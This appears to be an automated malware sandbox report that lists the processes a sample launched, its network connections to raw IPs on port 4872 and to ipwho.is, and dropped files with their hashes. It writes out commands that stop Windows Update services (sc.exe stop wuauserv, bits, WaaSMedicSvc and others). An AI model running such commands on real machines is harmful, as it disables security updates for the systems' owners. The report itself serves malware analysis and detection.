C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{09f4a227-cef4-4b5d-ba7b-580721731d4e}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c3f2fd93-4d00-463c-bd0a-7536c6c18483}
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | appengine.google.com | udp |
| US | 174.61.118.194:4872 | | tcp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 73.179.34.234:4872 | | tcp |
| US | 174.61.118.194:4872 | | tcp |
Files
C:\Windows\systemprocess.exe
| MD5 | b5e966fbfca567c51d5da8b2106a48e5 |
| SHA1 | 164ace9df43f1a760c1205f82c9cc4eb1dfee991 |
| SHA256 | 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8 |
| SHA512 | 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534 |
memory/5768-14-0x00007FF973103000-0x00007FF973105000-memory.dmp
C:\Windows\host.exe
| MD5 | 1cf0ec247776f6817231070a2f75994c |
| SHA1 | 3253eccccece8243d11975e7021569251def8f2f |
| SHA256 | e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051 |
| SHA512 | f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90 |
memory/5768-29-0x0000018E2D8D0000-0x0000018E2DA62000-memory.dmp
C:\Windows\CompPkg.exe
| MD5 | 39ba631f3e54a2c480e7c83e5e6d14ff |
| SHA1 | 82f3e3f1faf9d879a37e473a81cb5d32672af099 |
| SHA256 | 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64 |
| SHA512 | 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iad1besm.ot2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 86c4045b8d294c8282009af508fff707 |
| SHA1 | 56932ef154b5ed1046300446bacf50a8d44c147b |
| SHA256 | 2890b9aa2b9b856fe1b3de029e8bb42d28f961ee99c1362b5c31a91ec3fee059 |
| SHA512 | f1bf59232a6ab749ace9245a89029f0e064f132c9515477c0213c6f942341d2b5493cd0adbaa3a401b87078aec3dd9f1f5eed9ad393672e555c02e539a079648 |
memory/5768-102-0x0000018E48800000-0x0000018E48812000-memory.dmp
memory/5768-103-0x00007FF973103000-0x00007FF973105000-memory.dmp
memory/5664-112-0x000001F577350000-0x000001F577372000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 86acdf583fc319a406c3f74a61d663fa |
| SHA1 | 604996c51c6aec2620a45decd4e59764e708c08f |
| SHA256 | 3a88e39b770621c79be35fbf685baf5e3cc9ce16fcf91bc67ac06247d081278c |
| SHA512 | f3e990090e66e4fe13659827b9405dc312abf81e6432da18ae11d0fa4b0ed5399bb4d9dc597459b5d5bdf333efdac702db4d78305ae9c0768f37229a27c17368 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb7d9cd87343b2c81c21c7b27e6ab694 |
| SHA1 | 27475110d09f1fc948f1d5ecf3e41aba752401fd |
| SHA256 | b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df |
| SHA512 | bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkg.exe.log
| MD5 | 4a01567f513143419390cb40e6abaf71 |
| SHA1 | d0d714d6e526a652fc4e5de4e6040d6b0e7687ab |
| SHA256 | 6efaeb6a1b391155453a57c7e437575bb18efc174f3099d984d9dea49eecebad |
| SHA512 | 379fcb42d0f72d302482fadd4f25cbfa9c5f6a9c50222877d0eed91f237ec688eb52f65ee0d3fccfd017a6b14bd36f34fa0b77a388728fe3942a981322d7a4bc |
memory/5608-899-0x0000000000820000-0x000000000088A000-memory.dmp
memory/5208-922-0x0000000000180000-0x00000000001EA000-memory.dmp